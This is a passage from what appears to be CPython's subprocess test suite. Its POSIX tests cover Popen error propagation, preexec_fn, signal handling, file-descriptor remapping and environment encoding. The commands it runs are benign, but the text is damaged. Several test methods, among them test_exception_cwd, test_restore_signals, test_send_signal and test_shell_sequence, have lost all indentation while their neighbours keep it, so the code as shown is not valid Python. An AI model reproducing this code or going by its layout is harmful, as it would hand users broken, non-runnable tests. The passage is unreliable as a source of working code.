        newenv["FRUIT"] = "banana"
        cp = self.run_python(('import sys, os;'
                              'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
                             env=newenv)
        self.assertEqual(cp.returncode, 33)
    def test_capture_output(self):
        # capture_output=True captures both stdout and stderr.
        cp = self.run_python(("import sys;"
                              "sys.stdout.write('BDFL'); "
                              "sys.stderr.write('FLUFL')"),
                             capture_output=True)
        self.assertIn(b'BDFL', cp.stdout)
        self.assertIn(b'FLUFL', cp.stderr)
    def test_stdout_with_capture_output_arg(self):
        # run() refuses to accept 'stdout' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stdout and capture_output "
                 "args supplied.")) as c:
            output = self.run_python("print('will not be run')",
                                     capture_output=True, stdout=tf)
        self.assertIn('stdout', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])
    def test_stderr_with_capture_output_arg(self):
        # run() refuses to accept 'stderr' with 'capture_output'
        tf = tempfile.TemporaryFile()
        self.addCleanup(tf.close)
        with self.assertRaises(ValueError,
            msg=("Expected ValueError when stderr and capture_output "
                 "args supplied.")) as c:
            output = self.run_python("print('will not be run')",
                                     capture_output=True, stderr=tf)
        self.assertIn('stderr', c.exception.args[0])
        self.assertIn('capture_output', c.exception.args[0])
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
    def setUp(self):
        super().setUp()
        # Path that is guaranteed not to exist; used by the chdir/exec tests.
        self._nonexistent_dir = "/_this/pa.th/does/not/exist"
    def _get_chdir_exception(self):
        # Produce the exact OSError that chdir() raises for the bad directory
        # so callers can compare errno/strerror without hard-coding values.
        try:
            os.chdir(self._nonexistent_dir)
        except OSError as e:
            # This avoids hard coding the errno value or the OS perror()
            # string and instead capture the exception that we want to see
            # below for comparison.
            desired_exception = e
            # Popen appends the repr of the offending path; mirror that here.
            desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
        else:
            self.fail("chdir to nonexistent directory %s succeeded." %
                      self._nonexistent_dir)
        return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
    # We mock the __del__ method for Popen in the next two tests
    # because it does cleanup based on the pid returned by fork_exec
    # along with issuing a resource warning if it still exists. Since
    # we don't actually spawn a process in these tests we can forego
    # the destructor. An alternative would be to set _child_created to
    # False before the destructor is called but there is no easy way
    # to do that
    class PopenNoDestructor(subprocess.Popen):
        # Popen subclass with a no-op destructor; see the comment above.
        def __del__(self):
            pass
    @mock.patch("subprocess._posixsubprocess.fork_exec")
    def test_exception_errpipe_normal(self, fork_exec):
        """Test error passing done through errpipe_write in the good case"""
        def proper_error(*args):
            # args[13] is the errpipe_write fd in fork_exec's argument list.
            errpipe_write = args[13]
            # Write the hex for the error code EISDIR: 'is a directory'
            err_code = '{:x}'.format(errno.EISDIR).encode()
            os.write(errpipe_write, b"OSError:" + err_code + b":")
            return 0
        fork_exec.side_effect = proper_error
        # waitpid must also be mocked: no real child exists to be reaped.
        with mock.patch("subprocess.os.waitpid",
                        side_effect=ChildProcessError):
            # The well-formed errpipe payload must be turned back into the
            # matching OSError subclass in the parent.
            with self.assertRaises(IsADirectoryError):
                self.PopenNoDestructor(["non_existent_command"])
    @mock.patch("subprocess._posixsubprocess.fork_exec")
    def test_exception_errpipe_bad_data(self, fork_exec):
        """Test error passing done through errpipe_write where its not
        in the expected format"""
        error_data = b"\xFF\x00\xDE\xAD"
        def bad_error(*args):
            # args[13] is the errpipe_write fd in fork_exec's argument list.
            errpipe_write = args[13]
            # Anything can be in the pipe, no assumptions should
            # be made about its encoding, so we'll write some
            # arbitrary hex bytes to test it out
            os.write(errpipe_write, error_data)
            return 0
        fork_exec.side_effect = bad_error
        # waitpid must also be mocked: no real child exists to be reaped.
        with mock.patch("subprocess.os.waitpid",
                        side_effect=ChildProcessError):
            with self.assertRaises(subprocess.SubprocessError) as e:
                self.PopenNoDestructor(["non_existent_command"])
        # The undecodable payload must be reported verbatim (as a repr).
        self.assertIn(repr(error_data), str(e.exception))
@unittest.skipIf(not os.path.exists('/proc/self/status'),
"need /proc/self/status")
def test_restore_signals(self):
# Blindly assume that cat exists on systems with /proc/self/status...
default_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=False)
for line in default_proc_status.splitlines():
if line.startswith(b'SigIgn'):
default_sig_ign_mask = line
break
else:
self.skipTest("SigIgn not found in /proc/self/status.")
restored_proc_status = subprocess.check_output(
['cat', '/proc/self/status'],
restore_signals=True)
for line in restored_proc_status.splitlines():
if line.startswith(b'SigIgn'):
restored_sig_ign_mask = line
break
self.assertNotEqual(default_sig_ign_mask, restored_sig_ign_mask,
msg="restore_signals=True should've unblocked "
"SIGPIPE and friends.")
    def test_start_new_session(self):
        # For code coverage of calling setsid(). We don't care if we get an
        # EPERM error from it depending on the test execution environment, that
        # still indicates that it was called.
        try:
            output = subprocess.check_output(
                            [sys.executable, "-c",
                             "import os; print(os.getpgid(os.getpid()))"],
                            start_new_session=True)
        except OSError as e:
            # EPERM proves setsid() ran; anything else is a real failure.
            if e.errno != errno.EPERM:
                raise
        else:
            # setsid() succeeded: the child must be in its own process group.
            parent_pgid = os.getpgid(os.getpid())
            child_pgid = int(output)
            self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals intenum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
    def test_preexec(self):
        # DISCLAIMER: Setting environment variables is *not* a good use
        # of a preexec_fn. This is merely a test.
        # preexec_fn runs after fork() but before exec(), so os.putenv there
        # affects only the child's environment.
        p = subprocess.Popen([sys.executable, "-c",
                              'import sys,os;'
                              'sys.stdout.write(os.getenv("FRUIT"))'],
                             stdout=subprocess.PIPE,
                             preexec_fn=lambda: os.putenv("FRUIT", "apple"))
        with p:
            self.assertEqual(p.stdout.read(), b"apple")
    def test_preexec_exception(self):
        # An exception raised inside preexec_fn must be reported to the
        # parent, not silently swallowed in the forked child.
        def raise_it():
            raise ValueError("What if two swallows carried a coconut?")
        try:
            p = subprocess.Popen([sys.executable, "-c", ""],
                                 preexec_fn=raise_it)
        except subprocess.SubprocessError as e:
            # The C extension (_posixsubprocess) wraps preexec_fn failures
            # in SubprocessError; confirm the extension is actually in use.
            self.assertTrue(
                    subprocess._posixsubprocess,
                    "Expected a ValueError from the preexec_fn")
        except ValueError as e:
            # The pure Python fallback propagates the original message.
            self.assertIn("coconut", e.args[0])
        else:
            self.fail("Exception raised by preexec_fn did not make it "
                      "to the parent process.")
    class _TestExecuteChildPopen(subprocess.Popen):
        """Used to test behavior at the end of _execute_child."""
        def __init__(self, testcase, *args, **kwargs):
            # Keep a reference to the TestCase so _execute_child can assert.
            self._testcase = testcase
            subprocess.Popen.__init__(self, *args, **kwargs)
        def _execute_child(self, *args, **kwargs):
            try:
                subprocess.Popen._execute_child(self, *args, **kwargs)
            finally:
                # Open a bunch of file descriptors and verify that
                # none of them are the same as the ones the Popen
                # instance is using for stdin/stdout/stderr.
                # (If one matched, a std fd was closed prematurely and its
                # number was recycled by os.open.)
                devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
                               for _ in range(8)]
                try:
                    for fd in devzero_fds:
                        self._testcase.assertNotIn(
                                fd, (self.stdin.fileno(), self.stdout.fileno(),
                                     self.stderr.fileno()),
                                msg="At least one fd was closed early.")
                finally:
                    for fd in devzero_fds:
                        os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
    def test_preexec_gc_module_failure(self):
        # This tests the code that disables garbage collection if the child
        # process will execute any Python.
        def raise_runtime_error():
            raise RuntimeError("this shouldn't escape")
        # Remember the original gc state/functions so they can be restored
        # exactly, even if an assertion fails mid-test.
        enabled = gc.isenabled()
        orig_gc_disable = gc.disable
        orig_gc_isenabled = gc.isenabled
        try:
            gc.disable()
            self.assertFalse(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            # Popen must not flip gc on behind our back...
            self.assertFalse(gc.isenabled(),
                             "Popen enabled gc when it shouldn't.")
            gc.enable()
            self.assertTrue(gc.isenabled())
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
            # ...nor leave it off when it was on.
            self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
            # Failures raised by the gc module itself must propagate.
            gc.disable = raise_runtime_error
            self.assertRaises(RuntimeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)
            del gc.isenabled  # force an AttributeError
            self.assertRaises(AttributeError, subprocess.Popen,
                              [sys.executable, '-c', ''],
                              preexec_fn=lambda: None)
        finally:
            gc.disable = orig_gc_disable
            gc.isenabled = orig_gc_isenabled
            if not enabled:
                gc.disable()
    @unittest.skipIf(
        sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
    def test_preexec_fork_failure(self):
        # The internal code did not preserve the previous exception when
        # re-enabling garbage collection
        try:
            from resource import getrlimit, setrlimit, RLIMIT_NPROC
        except ImportError as err:
            self.skipTest(err)  # RLIMIT_NPROC is specific to Linux and BSD
        limits = getrlimit(RLIMIT_NPROC)
        [_, hard] = limits
        # A zero soft limit on processes makes fork() fail with EAGAIN.
        setrlimit(RLIMIT_NPROC, (0, hard))
        self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
        try:
            subprocess.call([sys.executable, '-c', ''],
                            preexec_fn=lambda: None)
        except BlockingIOError:
            # Forking should raise EAGAIN, translated to BlockingIOError
            pass
        else:
            self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
    def test_specific_shell(self):
        # Issue #9265: Incorrect name passed as arg[0].
        # Collect whichever Bourne-compatible shells are installed.
        shells = []
        for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
            for name in ['bash', 'ksh']:
                sh = os.path.join(prefix, name)
                if os.path.isfile(sh):
                    shells.append(sh)
        if not shells:  # Will probably work for any shell but csh.
            self.skipTest("bash or ksh required for this test")
        sh = '/bin/sh'
        if os.path.isfile(sh) and not os.path.islink(sh):
            # Test will fail if /bin/sh is a symlink to csh.
            shells.append(sh)
        for sh in shells:
            # $0 must be the shell named by `executable`, not args[0].
            p = subprocess.Popen("echo $0", executable=sh, shell=True,
                                 stdout=subprocess.PIPE)
            with p:
                self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
    def _kill_process(self, method, *args):
        # Helper: start a child that blocks for 30s, wait until its
        # interpreter is fully up (it prints 'x'), then invoke
        # Popen.<method>(*args) on it and return the Popen object.
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        # Also set the SIGINT handler to the default to make sure it's not
        # being ignored (some tests rely on that.)
        old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
        try:
            p = subprocess.Popen([sys.executable, "-c", """if 1:
                                 import sys, time
                                 sys.stdout.write('x\\n')
                                 sys.stdout.flush()
                                 time.sleep(30)
                                 """],
                                 close_fds=True,
                                 stdin=subprocess.PIPE,
                                 stdout=subprocess.PIPE,
                                 stderr=subprocess.PIPE)
        finally:
            signal.signal(signal.SIGINT, old_handler)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        getattr(p, method)(*args)
        return p
    # NOTE(review): this skip decorator sits on a helper, not a test_*
    # method; presumably calling the decorated helper raises SkipTest,
    # which skips the calling test — confirm that is the intent.
    @unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
                     "Due to known OS bug (issue #16762)")
    def _kill_dead_process(self, method, *args):
        # Helper: invoke Popen.<method>(*args) on a child that has already
        # exited; the call must not raise.
        # Do not inherit file handles from the parent.
        # It should fix failures on some platforms.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                             import sys, time
                             sys.stdout.write('x\\n')
                             sys.stdout.flush()
                             """],
                             close_fds=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        # Wait for the interpreter to be completely initialized before
        # sending any signal.
        p.stdout.read(1)
        # The process should end after this
        # NOTE(review): assumes the child exits within one second — could be
        # racy on a heavily loaded machine.
        time.sleep(1)
        # This shouldn't raise even though the child is now dead
        getattr(p, method)(*args)
        p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
    def test_send_signal_dead(self):
        # Sending a signal to a dead process must not raise.
        self._kill_dead_process('send_signal', signal.SIGINT)
    def test_kill_dead(self):
        # Killing a dead process must not raise.
        self._kill_dead_process('kill')
    def test_terminate_dead(self):
        # Terminating a dead process must not raise.
        self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
    def check_close_std_fds(self, fds):
        # Issue #9905: test that subprocess pipes still work properly with
        # some standard fds closed
        stdin = 0
        # Save (and dup) the listed std fds first; if fd 0 is among them the
        # child's stdin must come from the saved duplicate, since the
        # original will be closed below.
        saved_fds = self._save_fds(fds)
        for fd, saved, inheritable in saved_fds:
            if fd == 0:
                stdin = saved
                break
        try:
            for fd in fds:
                os.close(fd)
            out, err = subprocess.Popen([sys.executable, "-c",
                              'import sys;'
                              'sys.stdout.write("apple");'
                              'sys.stdout.flush();'
                              'sys.stderr.write("orange")'],
                       stdin=stdin,
                       stdout=subprocess.PIPE,
                       stderr=subprocess.PIPE).communicate()
            err = support.strip_python_stderr(err)
            self.assertEqual((out, err), (b'apple', b'orange'))
        finally:
            self._restore_fds(saved_fds)
    def test_close_fd_0(self):
        # Pipes must still work with stdin (fd 0) closed in the parent.
        self.check_close_std_fds([0])
    def test_close_fd_1(self):
        # Pipes must still work with stdout (fd 1) closed in the parent.
        self.check_close_std_fds([1])
    def test_close_fd_2(self):
        # Pipes must still work with stderr (fd 2) closed in the parent.
        self.check_close_std_fds([2])
    def test_close_fds_0_1(self):
        # Pipes must still work with fds 0 and 1 closed in the parent.
        self.check_close_std_fds([0, 1])
    def test_close_fds_0_2(self):
        # Pipes must still work with fds 0 and 2 closed in the parent.
        self.check_close_std_fds([0, 2])
    def test_close_fds_1_2(self):
        # Pipes must still work with fds 1 and 2 closed in the parent.
        self.check_close_std_fds([1, 2])
    def test_close_fds_0_1_2(self):
        # Issue #10806: test that subprocess pipes still work properly with
        # all standard fds closed.
        self.check_close_std_fds([0, 1, 2])
    def test_small_errpipe_write_fd(self):
        """Issue #15798: Popen should work when stdio fds are available."""
        # Closing fds 0 and 1 means the internal errpipe gets a low fd
        # number, exercising the low-fd code paths in _execute_child.
        new_stdin = os.dup(0)
        new_stdout = os.dup(1)
        try:
            os.close(0)
            os.close(1)
            # Side test: if errpipe_write fails to have its CLOEXEC
            # flag set this should cause the parent to think the exec
            # failed. Extremely unlikely: everyone supports CLOEXEC.
            subprocess.Popen([
                    sys.executable, "-c",
                    "print('AssertionError:0:CLOEXEC failure.')"]).wait()
        finally:
            # Restore original stdin and stdout
            os.dup2(new_stdin, 0)
            os.dup2(new_stdout, 1)
            os.close(new_stdin)
            os.close(new_stdout)
    def test_remapping_std_fds(self):
        # Give the child its std streams from fds that are already 0/1/2 in
        # the parent but in a different ("wrong") order, forcing subprocess
        # to rearrange them carefully in the child.
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        try:
            temp_fds = [fd for fd, fname in temps]
            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)
            # write some data to what will become stdin, and rewind
            os.write(temp_fds[1], b"STDIN")
            os.lseek(temp_fds[1], 0, 0)
            # move the standard file descriptors out of the way
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the file objects over the standard fd's
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)
                # now use those files in the "wrong" order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=temp_fds[1],
                    stdout=temp_fds[2],
                    stderr=temp_fds[0])
                p.wait()
            finally:
                self._restore_fds(saved_fds)
            for fd in temp_fds:
                os.lseek(fd, 0, 0)
            # Read back what the child wrote to each temp file.
            out = os.read(temp_fds[2], 1024)
            err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")
        finally:
            for fd in temp_fds:
                os.close(fd)
    def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
        # Helper for test_swap_fds: run a child whose std streams are the
        # given permutation of fds 0/1/2 and verify nothing was clobbered
        # while the child's fds were being rearranged.
        # open up some temporary files
        temps = [tempfile.mkstemp() for i in range(3)]
        temp_fds = [fd for fd, fname in temps]
        try:
            # unlink the files -- we won't need to reopen them
            for fd, fname in temps:
                os.unlink(fname)
            # save a copy of the standard file descriptors
            saved_fds = self._save_fds(range(3))
            try:
                # duplicate the temp files over the standard fd's 0, 1, 2
                for fd, temp_fd in enumerate(temp_fds):
                    os.dup2(temp_fd, fd)
                # write some data to what will become stdin, and rewind
                os.write(stdin_no, b"STDIN")
                os.lseek(stdin_no, 0, 0)
                # now use those files in the given order, so that subprocess
                # has to rearrange them in the child
                p = subprocess.Popen([sys.executable, "-c",
                    'import sys; got = sys.stdin.read();'
                    'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
                    stdin=stdin_no,
                    stdout=stdout_no,
                    stderr=stderr_no)
                p.wait()
                for fd in temp_fds:
                    os.lseek(fd, 0, 0)
                # Read back what the child wrote before restoring our fds.
                out = os.read(stdout_no, 1024)
                err = support.strip_python_stderr(os.read(stderr_no, 1024))
            finally:
                self._restore_fds(saved_fds)
            self.assertEqual(out, b"got STDIN")
            self.assertEqual(err, b"err")
        finally:
            for fd in temp_fds:
                os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
    def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
        # Helper for test_swap_std_fds_with_one_closed: back two of the
        # parent's std fds with temp files, close the third, redirect the
        # child's streams per from_fds->to_fds, and verify each temp file
        # received exactly its target descriptor number.
        saved_fds = self._save_fds(range(3))
        try:
            for from_fd in from_fds:
                with tempfile.TemporaryFile() as f:
                    os.dup2(f.fileno(), from_fd)
            # Close the one std fd not listed in from_fds.
            fd_to_close = (set(range(3)) - set(from_fds)).pop()
            os.close(fd_to_close)
            arg_names = ['stdin', 'stdout', 'stderr']
            kwargs = {}
            for from_fd, to_fd in zip(from_fds, to_fds):
                kwargs[arg_names[to_fd]] = from_fd
            code = textwrap.dedent(r'''
                import os, sys
                skipped_fd = int(sys.argv[1])
                for fd in range(3):
                    if fd != skipped_fd:
                        os.write(fd, str(fd).encode('ascii'))
            ''')
            # The child skips the one std stream that has no redirection.
            skipped_fd = (set(range(3)) - set(to_fds)).pop()
            rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
                                 **kwargs)
            self.assertEqual(rc, 0)
            for from_fd, to_fd in zip(from_fds, to_fds):
                os.lseek(from_fd, 0, os.SEEK_SET)
                read_bytes = os.read(from_fd, 1024)
                read_fds = list(map(int, read_bytes.decode('ascii')))
                msg = textwrap.dedent(f"""
                    When testing {from_fds} to {to_fds} redirection,
                    parent descriptor {from_fd} got redirected
                    to descriptor(s) {read_fds} instead of descriptor {to_fd}.
                    """)
                self.assertEqual([to_fd], read_fds, msg)
        finally:
            self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
    def test_surrogates_error_message(self):
        # A preexec_fn exception whose message contains surrogates must
        # still be reported to the parent without crashing.
        def prepare():
            raise ValueError("surrogate:\uDCff")
        try:
            subprocess.call(
                [sys.executable, "-c", "pass"],
                preexec_fn=prepare)
        except ValueError as err:
            # Pure Python implementations keeps the message
            self.assertIsNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "surrogate:\uDCff")
        except subprocess.SubprocessError as err:
            # _posixsubprocess uses a default message
            self.assertIsNotNone(subprocess._posixsubprocess)
            self.assertEqual(str(err), "Exception occurred in preexec_fn.")
        else:
            self.fail("Expected ValueError or subprocess.SubprocessError")
    def test_undecodable_env(self):
        # Environment keys/values containing surrogates must round-trip to
        # the child, both as str (surrogateescape) and as raw bytes.
        for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
            encoded_value = value.encode("ascii", "surrogateescape")
            # test str with surrogates
            script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = value
            # Use C locale to get ASCII for the locale encoding to force
            # surrogate-escaping of \xFF in the child process; otherwise it can
            # be decoded as-is if the default locale is latin-1.
            env['LC_ALL'] = 'C'
            if sys.platform.startswith("aix"):
                # On AIX, the C locale uses the Latin1 encoding
                decoded_value = encoded_value.decode("latin1", "surrogateescape")
            else:
                # On other UNIXes, the C locale uses the ASCII encoding
                decoded_value = value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
            # test bytes
            key = key.encode("ascii", "surrogateescape")
            script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
            env = os.environ.copy()
            env[key] = encoded_value
            stdout = subprocess.check_output(
                [sys.executable, "-c", script],
                env=env)
            stdout = stdout.rstrip(b'\n\r')
            self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
    def test_bytes_program(self):
        # A program given as bytes must work in all launch modes: absolute
        # path, shell string, and PATH lookup with str or bytes environment.
        abs_program = os.fsencode(sys.executable)
        path, program = os.path.split(sys.executable)
        program = os.fsencode(program)
        # absolute bytes path
        exitcode = subprocess.call([abs_program, "-c", "pass"])
        self.assertEqual(exitcode, 0)
        # absolute bytes path as a string
        cmd = b"'" + abs_program + b"' -c pass"
        exitcode = subprocess.call(cmd, shell=True)
        self.assertEqual(exitcode, 0)
        # bytes program, unicode PATH
        env = os.environ.copy()
        env["PATH"] = path
        exitcode = subprocess.call([program, "-c", "pass"], env=env)
        self.assertEqual(exitcode, 0)
        # bytes program, bytes PATH
        envb = os.environb.copy()
        envb[b"PATH"] = os.fsencode(path)
        exitcode = subprocess.call([program, "-c", "pass"], env=envb)
        self.assertEqual(exitcode, 0)
    def test_pipe_cloexec(self):
        # Even with close_fds=False, the pipe fds created by one Popen must
        # not leak into a sibling child (they are created CLOEXEC).
        sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        p1 = subprocess.Popen([sys.executable, sleeper],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE, close_fds=False)
        self.addCleanup(p1.communicate, b'')
        # fd_status.py prints the fds open in the second child.
        p2 = subprocess.Popen([sys.executable, fd_status],
                              stdout=subprocess.PIPE, close_fds=False)
        output, error = p2.communicate()
        result_fds = set(map(int, output.split(b',')))
        unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
                            p1.stderr.fileno()])
        self.assertFalse(result_fds & unwanted_fds,
                         "Expected no fds from %r to be open in child, "
                         "found %r" %
                              (unwanted_fds, result_fds & unwanted_fds))
    def test_pipe_cloexec_real_tools(self):
        # Chain two children (qcat | qgrep) through a pipe with
        # close_fds=False; CLOEXEC on the pipe ends must keep the pipeline
        # from deadlocking (qgrep would never see EOF if it inherited the
        # write end).
        qcat = support.findfile("qcat.py", subdir="subprocessdata")
        qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
        subdata = b'zxcvbn'
        data = subdata * 4 + b'\n'
        p1 = subprocess.Popen([sys.executable, qcat],
                              stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                              close_fds=False)
        p2 = subprocess.Popen([sys.executable, qgrep, subdata],
                              stdin=p1.stdout, stdout=subprocess.PIPE,
                              close_fds=False)
        self.addCleanup(p1.wait)
        self.addCleanup(p2.wait)
        # Terminate the children on cleanup, tolerating ones already gone.
        def kill_p1():
            try:
                p1.terminate()
            except ProcessLookupError:
                pass
        def kill_p2():
            try:
                p2.terminate()
            except ProcessLookupError:
                pass
        self.addCleanup(kill_p1)
        self.addCleanup(kill_p2)
        p1.stdin.write(data)
        p1.stdin.close()
        # Use select with a timeout so a hung pipeline fails instead of
        # blocking the test run forever.
        readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
        self.assertTrue(readfiles, "The child hung")
        self.assertEqual(p2.stdout.read(), data)
        p1.stdout.close()
        p2.stdout.close()
    def test_close_fds(self):
        # Verify the three close_fds behaviors: close_fds=False keeps
        # inheritable fds open, close_fds=True closes them, and pass_fds
        # exempts a chosen subset even with close_fds=True.
